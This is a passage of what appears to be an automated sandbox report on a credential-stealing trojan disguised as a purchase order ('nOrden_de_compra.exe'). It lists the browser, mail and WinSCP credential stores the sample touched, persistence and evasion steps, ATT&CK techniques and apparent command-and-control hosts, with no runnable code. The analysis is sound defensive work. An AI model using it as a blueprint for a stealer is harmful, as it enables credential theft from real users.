                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Users\user\Desktop\nOrden_de_compra.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 1176, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.71a0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.71a0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.2cde9dc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.7160000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.27de9e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.27de9e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3ca9970.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.7160000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2146832318.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 1176, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 1176, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.71a0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.71a0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.2cde9dc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.7160000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.27de9e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.nNdsLvHyWi.exe.27de9e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3ca9970.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.7160000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2146832318.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing
                      NTDS211
                      Security Software Discovery
                      Distributed Component Object Model21
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets1
                      Process Discovery
                      SSH1
                      Clipboard Data
                      23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials141
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1385592 Sample: nOrden_de_compra.exe Startdate: 02/02/2024 Architecture: WINDOWS Score: 100 42 mail.triorentacar.ro 2->42 44 triorentacar.ro 2->44 46 2 other IPs or domains 2->46 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Sigma detected: Scheduled temp file as task from temp location 2->56 58 10 other signatures 2->58 8 nOrden_de_compra.exe 7 2->8         started        12 nNdsLvHyWi.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\nNdsLvHyWi.exe, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpD5F2.tmp, XML 8->40 dropped 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->60 62 Uses schtasks.exe or at.exe to add and modify task schedules 8->62 64 Adds a directory exclusion to Windows Defender 8->64 14 nOrden_de_compra.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 66 Multi AV Scanner detection for dropped file 12->66 68 Machine Learning detection for dropped file 12->68 70 Injects a PE file into a foreign processes 12->70 22 nNdsLvHyWi.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 48 api4.ipify.org 173.231.16.76, 443, 49702, 49706 WEBNXUS United States 14->48 50 triorentacar.ro 89.32.46.159, 49703, 49707, 49708 WEBCLASSITRO Romania 14->50 72 Installs a global keyboard hook 14->72 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->74 76 Tries to steal Mail credentials (via file / registry access) 22->76 78 Tries to harvest and steal browser information (history, passwords, etc) 22->78 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      nOrden_de_compra.exe63%ReversingLabsByteCode-MSIL.Trojan.FormBook
                      nOrden_de_compra.exe43%VirustotalBrowse
                      nOrden_de_compra.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe63%ReversingLabsByteCode-MSIL.Trojan.FormBook
                      C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe43%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      triorentacar.ro0%VirustotalBrowse
                      mail.triorentacar.ro0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://crl.m0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://mail.triorentacar.ro0%VirustotalBrowse
                      http://www.microsoft.80%Avira URL Cloudsafe
                      http://mail.triorentacar.ro0%Avira URL Cloudsafe
                      http://triorentacar.ro0%Avira URL Cloudsafe
                      http://triorentacar.ro0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api4.ipify.org
                      173.231.16.76
                      truefalse
                        high
                        triorentacar.ro
                        89.32.46.159
                        truefalseunknown
                        api.ipify.org
                        unknown
                        unknownfalse
                          high
                          mail.triorentacar.ro
                          unknown
                          unknowntrueunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.orgnOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
